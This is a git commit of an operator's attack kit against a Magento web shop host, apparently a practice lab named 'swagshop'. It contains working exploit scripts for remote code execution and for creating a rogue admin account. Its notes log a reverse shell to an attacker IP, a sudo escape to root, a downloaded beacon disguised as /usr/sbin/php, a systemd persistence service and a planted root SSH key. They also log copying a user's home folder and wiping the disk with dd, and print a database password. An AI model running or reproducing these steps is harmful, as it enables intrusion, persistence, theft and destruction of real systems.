Commit 318a5e5
Changed files (12)
2025-04-06_wolverine-strike
2025-04-05
2025-04-06
2025-04-06_wolverine-strike/2025-04-04/exp.py
@@ -0,0 +1,84 @@
+#!/usr/bin/python
+# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
+# Google Dork: "Powered by Magento"
+# Date: 08/18/2015
+# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
+# Vendor Homepage: http://magento.com/
+# Software Link: https://www.magentocommerce.com/download
+# Version: 1.9.0.1 and below
+# Tested on: Ubuntu 15
+# CVE : none
+
+from hashlib import md5
+import sys
+import re
+import base64
+import mechanize
+
+
+def usage():
+ print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"")
+ sys.exit()
+
+
+if len(sys.argv) != 3:
+ usage()
+
+# Command-line args
+target = sys.argv[1]
+arg = sys.argv[2]
+
+# Config.
+username = 'ypwq'
+password = '123'
+php_function = 'system' # Note: we can only pass 1 argument to the function
+install_date = b'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
+
+# POP chain to pivot into call_user_exec
+payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
+ '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
+ 'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
+ 'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
+ '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
+ ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
+ len(arg), arg)
+# Setup the mechanize browser and options
+br = mechanize.Browser()
+#br.set_proxies({"http": "localhost:8080"})
+br.set_handle_robots(False)
+
+request = br.open(target)
+
+br.select_form(nr=0)
+#br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
+br.form.fixup()
+br['login[username]'] = username
+br['login[password]'] = password
+
+br.method = "POST"
+request = br.submit()
+content = request.read()
+
+url = re.search("ajaxBlockUrl = \'(.*)\'", content.decode())
+url = url.group(1)
+key = re.search("var FORM_KEY = '(.*)'", content.decode())
+key = key.group(1)
+
+request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+tunnel = re.search("src=\"(.*)\?ga=", request.read().decode())
+tunnel = tunnel.group(1)
+
+payload = base64.b64encode(payload.encode())
+gh = md5(payload + install_date).hexdigest()
+
+#print("T",tunnel)
+#print("P",payload)
+#print("GH", gh)
+exploit = tunnel + '?ga=' + payload.decode() + '&h=' + gh
+
+try:
+ request = br.open(exploit)
+except (mechanize.HTTPError, mechanize.URLError) as e:
+ print(e.read().decode())
+
+
2025-04-06_wolverine-strike/2025-04-04/notes.txt
@@ -0,0 +1,46 @@
+2025-04-04T08:07:59-04:00
+
+sudo apt install -y nmap curl python3-venv make zip unzip
+sudo openvpn --config htb.ovpn
+
+### T1 10.129.232.93
+
+ping -c 1 10.129.232.93
+nmap -sV -T4 10.129.232.93
+
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+
+up, ports open
+
+10.129.232.93 swagshop.htb
+
+curl -L http://swagshop.htb/app/etc/local.xml
+
+magneto software
+10.129.232.93 swagshop.htb
+
+
+curl -L -O https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar
+
+ Magento Information
++-----------+------------------+
+| Parameter | Value |
++-----------+------------------+
+| Edition | Community |
+| Version | 1.9.0.0, 1.9.0.1 |
++-----------+------------------+
+
+2025-04-04T08:28:28-04:00 WORKED
+Check http://swagshop.htb/admin with creds ypwq:123
+masq succes
+
+
+2025-04-04T08:39:33-04:00
+nc -l -p 4444
+python3 exp.py http://swagshop.htb/index.php/admin /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'
+success
+
+running find
+exit
2025-04-06_wolverine-strike/2025-04-04/poc.py
@@ -0,0 +1,39 @@
+import requests
+import base64
+import sys
+
+target = sys.argv[1]
+
+if not target.startswith("http"):
+ target = "http://" + target
+
+if target.endswith("/"):
+ target = target[:-1]
+
+target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
+
+# For demo purposes, I use the same attack as is being used in the wild
+SQLQUERY="""
+SET @SALT = 'rp';
+SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
+SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
+INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
+INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
+"""
+
+# Put the nice readable queries into one line,
+# and insert the username:password combinination
+query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
+pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query).encode()
+
+# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
+r = requests.post(target_url,
+ data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
+ "filter": base64.b64encode(pfilter),
+ "forwarded": 1})
+if r.ok:
+ print("WORKED")
+ print("Check {0}/admin with creds ypwq:123".format(target))
+else:
+ print("DID NOT WORK")
+
2025-04-06_wolverine-strike/2025-04-05/out/php.service
@@ -0,0 +1,12 @@
+[Unit]
+Description=php service
+After=network.target
+
+[Service]
+Type=simple
+Restart=always
+RestartSec=1
+ExecStart=/usr/sbin/php
+
+[Install]
+WantedBy=multi-user.target
2025-04-06_wolverine-strike/2025-04-05/exp.py
@@ -0,0 +1,84 @@
+#!/usr/bin/python
+# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
+# Google Dork: "Powered by Magento"
+# Date: 08/18/2015
+# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
+# Vendor Homepage: http://magento.com/
+# Software Link: https://www.magentocommerce.com/download
+# Version: 1.9.0.1 and below
+# Tested on: Ubuntu 15
+# CVE : none
+
+from hashlib import md5
+import sys
+import re
+import base64
+import mechanize
+
+
+def usage():
+ print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"")
+ sys.exit()
+
+
+if len(sys.argv) != 3:
+ usage()
+
+# Command-line args
+target = sys.argv[1]
+arg = sys.argv[2]
+
+# Config.
+username = 'ypwq'
+password = '123'
+php_function = 'system' # Note: we can only pass 1 argument to the function
+install_date = b'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
+
+# POP chain to pivot into call_user_exec
+payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
+ '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
+ 'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
+ 'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
+ '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
+ ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
+ len(arg), arg)
+# Setup the mechanize browser and options
+br = mechanize.Browser()
+#br.set_proxies({"http": "localhost:8080"})
+br.set_handle_robots(False)
+
+request = br.open(target)
+
+br.select_form(nr=0)
+#br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
+br.form.fixup()
+br['login[username]'] = username
+br['login[password]'] = password
+
+br.method = "POST"
+request = br.submit()
+content = request.read()
+
+url = re.search("ajaxBlockUrl = \'(.*)\'", content.decode())
+url = url.group(1)
+key = re.search("var FORM_KEY = '(.*)'", content.decode())
+key = key.group(1)
+
+request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+tunnel = re.search("src=\"(.*)\?ga=", request.read().decode())
+tunnel = tunnel.group(1)
+
+payload = base64.b64encode(payload.encode())
+gh = md5(payload + install_date).hexdigest()
+
+#print("T",tunnel)
+#print("P",payload)
+#print("GH", gh)
+exploit = tunnel + '?ga=' + payload.decode() + '&h=' + gh
+
+try:
+ request = br.open(exploit)
+except (mechanize.HTTPError, mechanize.URLError) as e:
+ print(e.read().decode())
+
+
2025-04-06_wolverine-strike/2025-04-05/notes.txt
@@ -0,0 +1,101 @@
+### setup
+
+sudo apt install -y \
+ nmap curl python3-venv make zip unzip \
+ mtr
+
+sudo openvpn --config htb.ovpn
+2025-04-05T08:04:58-04:00
+
+### T1 10.129.232.93
+
+ping -c 1 10.129.232.93
+
+python3 -m venv venv
+source venv/bin/activate
+python3 -m pip install mechanize
+python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'"
+2025-04-05T08:05:44-04:00
+
+
+which curl
+/usr/bin/curl
+
+uname -a
+Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+
+cat /etc/os-release
+NAME="Ubuntu"
+VERSION="18.04.6 LTS (Bionic Beaver)"
+ID=ubuntu
+ID_LIKE=debian
+PRETTY_NAME="Ubuntu 18.04.6 LTS"
+VERSION_ID="18.04"
+HOME_URL="https://www.ubuntu.com/"
+SUPPORT_URL="https://help.ubuntu.com/"
+BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+VERSION_CODENAME=bionic
+UBUNTU_CODENAME=bionic
+
+sudo -l
+sudo -l
+Matching Defaults entries for www-data on swagshop:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+User www-data may run the following commands on swagshop:
+ (root) NOPASSWD: /usr/bin/vi /var/www/html/*
+
+sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
+uid=0(root) gid=0(root) groups=0(root)
+
+mkdir -f /tmp/.X1-lock/
+curl -L -O g
+
+ 10.10.14.4
+
+generate beacon --http http://10.10.14.4:4444 --seconds 20 --os linux
+http --lport 4444
+
+curl -s -L http://10.10.14.4:8080/php -o /usr/sbin/php
+chmod +x /tmp/.php
+/tmp/.php
+2025-04-05T08:25:45-04:00
+
+root_rsa.pub
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As=
+
+
+mkdir /root/.ssh/
+upload /home/user/swag/2025-04-05/root_rsa.pub /root/.ssh/authorized_keys
+chmod /root/.ssh/authorized_keys 0400
+
+cat /etc/ssh/sshd_config
+#PermitRootLogin prohibit-password
+
+ssh -vvv root@10.129.232.93 -T /bin/bash
+2025-04-05T08:44:17-04:00
+
+mv /tmp/.php /usr/sbin/php
+
+php service
+
+[Unit]
+Description=php service
+After=network.target
+Type=simple
+Restart=always
+RestartSec=1
+ExecStart=/usr/sbin/php
+
+[Install]
+WantedBy=multi-user.target
+
+upload -o /home/user/swag/2025-04-05/out/php.service /lib/systemd/system/php.service
+execute systemctl daemon-reload
+execute systemctl enable php.service
+execute systemctl start php.service
+
+good service
+
2025-04-06_wolverine-strike/2025-04-05/root_rsa.pub
@@ -0,0 +1,1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As=
2025-04-06_wolverine-strike/2025-04-06/out/php.service
@@ -0,0 +1,12 @@
+[Unit]
+Description=php service
+After=network.target
+
+[Service]
+Type=simple
+Restart=always
+RestartSec=1
+ExecStart=/usr/sbin/php
+
+[Install]
+WantedBy=multi-user.target
2025-04-06_wolverine-strike/2025-04-06/out/root_rsa.pub
@@ -0,0 +1,1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As=
2025-04-06_wolverine-strike/2025-04-06/exp.py
@@ -0,0 +1,84 @@
+#!/usr/bin/python
+# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
+# Google Dork: "Powered by Magento"
+# Date: 08/18/2015
+# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
+# Vendor Homepage: http://magento.com/
+# Software Link: https://www.magentocommerce.com/download
+# Version: 1.9.0.1 and below
+# Tested on: Ubuntu 15
+# CVE : none
+
+from hashlib import md5
+import sys
+import re
+import base64
+import mechanize
+
+
+def usage():
+ print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"")
+ sys.exit()
+
+
+if len(sys.argv) != 3:
+ usage()
+
+# Command-line args
+target = sys.argv[1]
+arg = sys.argv[2]
+
+# Config.
+username = 'ypwq'
+password = '123'
+php_function = 'system' # Note: we can only pass 1 argument to the function
+install_date = b'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
+
+# POP chain to pivot into call_user_exec
+payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
+ '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
+ 'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
+ 'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
+ '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
+ ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
+ len(arg), arg)
+# Setup the mechanize browser and options
+br = mechanize.Browser()
+#br.set_proxies({"http": "localhost:8080"})
+br.set_handle_robots(False)
+
+request = br.open(target)
+
+br.select_form(nr=0)
+#br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
+br.form.fixup()
+br['login[username]'] = username
+br['login[password]'] = password
+
+br.method = "POST"
+request = br.submit()
+content = request.read()
+
+url = re.search("ajaxBlockUrl = \'(.*)\'", content.decode())
+url = url.group(1)
+key = re.search("var FORM_KEY = '(.*)'", content.decode())
+key = key.group(1)
+
+request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+tunnel = re.search("src=\"(.*)\?ga=", request.read().decode())
+tunnel = tunnel.group(1)
+
+payload = base64.b64encode(payload.encode())
+gh = md5(payload + install_date).hexdigest()
+
+#print("T",tunnel)
+#print("P",payload)
+#print("GH", gh)
+exploit = tunnel + '?ga=' + payload.decode() + '&h=' + gh
+
+try:
+ request = br.open(exploit)
+except (mechanize.HTTPError, mechanize.URLError) as e:
+ print(e.read().decode())
+
+
2025-04-06_wolverine-strike/2025-04-06/notes.txt
@@ -0,0 +1,117 @@
+2025-04-06T06:56:22-04:00
+
+sudo apt install -y nmap curl python3-venv make zip unzip
+sudo openvpn --config htb.ovpn
+
+### T1 10.129.232.125
+
+ping -c 1 10.129.232.125
+nmap -sV -T4 10.129.232.125
+
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+
+up, ports open
+
+magneto software
+10.129.232.125 swagshop.htb
+curl -L http://swagshop.htb/app/etc/local.xml
+
+
+python3 cli.py repl
+set --target 10.129.232.125
+
+ ๐ Done! Here's what we found:
+ Install Date: Wed, 08 May 2019 07:23:09 +0000
+ Hostname: localhost
+ Username: root
+ Password: fMVWh7bDHpgZkyfqQXreTjU9
+ Database Name: swagshop
+ Crypt Key: b355a9e0cd018d3f7f03607141518419
+
+python3 poc.py http://swagshop.htb
+create-user --username ypwq --password 123
+
+ ๐ถ Attempting to create a new user with the following creds:
+ username: ypwq
+ password: 123
+ ๐ Worked! Check 10.129.232.125/admin with creds ypwq:123
+ ๐ Set username to ypwq and password to 123
+
+2025-04-06T07:05:09-04:00
+
+python3 -m venv venv
+source venv/bin/activate
+python3 -m pip install mechanize
+nc -l -p 4444
+python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.153/443 0>&1'"
+2025-04-06T07:28:47-04:00
+
+sudo -l
+Matching Defaults entries for www-data on swagshop:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+User www-data may run the following commands on swagshop:
+ (root) NOPASSWD: /usr/bin/vi /var/www/html/*
+
+sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
+uid=0(root) gid=0(root) groups=0(root)
+2025-04-06T07:29:51-04:00
+
+generate beacon --http http://10.10.16.153:4444 --seconds 20 --os linux
+http --lport 4444
+
+curl -s -L http://10.10.16.153:8080/php -o /usr/sbin/php
+chmod +x /usr/sbin/php
+/usr/sbin/php
+2025-04-06T07:38:36-04:00
+
+root_rsa.pub
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As=
+
+mkdir /root/.ssh/
+upload /home/user/swag/2025-04-06/out/root_rsa.pub /root/.ssh/authorized_keys
+chmod /root/.ssh/authorized_keys 0400
+
+cat /etc/ssh/sshd_config
+#PermitRootLogin prohibit-password
+
+ssh -vvv root@10.129.232.125 -i out/root_rsa -T /bin/bash
+2025-04-06T07:44:04-04:00
+
+mv /tmp/.php /usr/sbin/php
+
+php service
+ [Unit]
+ Description=php service
+ After=network.target
+
+ [Service]
+ Type=simple
+ Restart=always
+ RestartSec=1
+ ExecStart=/usr/sbin/php
+
+ [Install]
+ WantedBy=multi-user.target
+
+upload -o /home/user/swag/2025-04-06/out/php.service /lib/systemd/system/php.service
+execute systemctl daemon-reload
+execute systemctl enable php.service
+execute systemctl start php.service
+2025-04-06T07:48:54-04:00
+
+find
+download /home/haris/ -r
+
+/bin/dd if=/dev/zero of=/dev/mapper/swagshop--vg-root
+ 2641 2415 root x86_64 /bin/dd
+2025-04-06T08:06:25-04:00
+
+terminate -F 1
+2025-04-06T08:12:04-04:00
+
+all processes and services non-responsive
+2025-04-06T08:20:52-04:00
2025-04-06_wolverine-strike/2025-04-06/poc.py
@@ -0,0 +1,39 @@
+import requests
+import base64
+import sys
+
+target = sys.argv[1]
+
+if not target.startswith("http"):
+ target = "http://" + target
+
+if target.endswith("/"):
+ target = target[:-1]
+
+target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
+
+# For demo purposes, I use the same attack as is being used in the wild
+SQLQUERY="""
+SET @SALT = 'rp';
+SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
+SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
+INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
+INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
+"""
+
+# Put the nice readable queries into one line,
+# and insert the username:password combinination
+query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
+pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query).encode()
+
+# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
+r = requests.post(target_url,
+ data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
+ "filter": base64.b64encode(pfilter),
+ "forwarded": 1})
+if r.ok:
+ print("WORKED")
+ print("Check {0}/admin with creds ypwq:123".format(target))
+else:
+ print("DID NOT WORK")
+